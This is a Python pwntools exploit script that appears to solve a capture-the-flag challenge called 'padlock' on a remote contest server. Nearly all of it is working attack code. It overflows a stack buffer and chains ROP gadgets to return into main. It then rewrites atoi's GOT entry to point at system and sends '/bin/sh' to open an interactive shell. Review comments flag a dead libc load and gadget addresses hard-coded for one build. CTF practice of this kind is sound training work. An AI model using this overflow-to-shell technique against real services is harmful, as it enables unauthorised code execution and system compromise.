from pwn import *

# Number of filler bytes placed in front of the first gadget in both payloads
# below (the distance to the saved return address is taken as given here and
# is not derived from anything in this script).
OFF = 80

# Load the challenge binary and make it the pwntools context (arch, bits, ...).
context.binary = elf = ELF("./padlock", checksec=False)

# NOTE(review): this assignment is dead -- `libc` is rebound on the very next
# statement, but the load still executes and will raise if
# /usr/lib/libc.so.6 does not exist on the machine running the script.
libc = ELF("/usr/lib/libc.so.6", checksec=False)

# The libc copy the symbol distance below is computed from. The computed
# `diff` is only meaningful if this file matches the libc the target is
# actually linked against -- confirm before relying on it.
libc = ELF("./libc.so.6", checksec=False)

# Local variant kept for debugging; the script as written talks to the
# remote service.
# p = process(elf.path)

p = remote("offsec.m0lecon.it", 13543)

# Addresses resolved from the binary's symbol table / GOT.
add_what = elf.sym["add_what_where"]
atoi_got = elf.got["atoi"]
main = elf.sym["main"]

# Hard-coded gadget addresses for this exact build of ./padlock; they are
# not recomputed from the ELF, so any rebuild of the binary invalidates them.
pop_rdi = 0x00000000004011FF # format string
pop_rsi = 0x0000000000401208 # got address
pop_rdx = 0x0000000000401211  # not used by either payload below
ret = 0x000000000040101A      # stack-alignment gadget placed before each call

# Wait for the program's input prompt (echoed for visibility).
print(p.recvuntil(b"[padlock] Decimal combination: "))

# populate got table
# First send: pad to the return address, align the stack, and return into
# main so the program runs through one more time. Presumably this is so
# that lazy binding has filled the atoi GOT slot before the second payload
# reads/modifies it -- TODO confirm against the binary's relocation mode.
first_run = flat(
    b"A" * OFF,
    p64(ret),
    p64(main),
)
p.sendline(first_run)

print(p.recvuntil(b"[padlock] Decimal combination: "))

# Distance between system and atoi in the local libc copy (see the caveat
# on the `libc` load above).
diff = libc.symbols["system"] - libc.symbols["atoi"]

# Second send: rdi = GOT slot of atoi, rsi = diff, then call
# add_what_where (presumably adds rsi to the qword at rdi -- verify in the
# binary), then realign and return into main again.
payload = flat(
    b"A" * OFF,
    p64(ret),
    p64(pop_rdi),
    p64(atoi_got),
    p64(pop_rsi),
    p64(diff),
    p64(add_what),
    p64(ret),
    p64(main),
)
p.sendline(payload)

# Next line of input handed to the program on its following run.
p.sendline(b"/bin/sh")

p.interactive()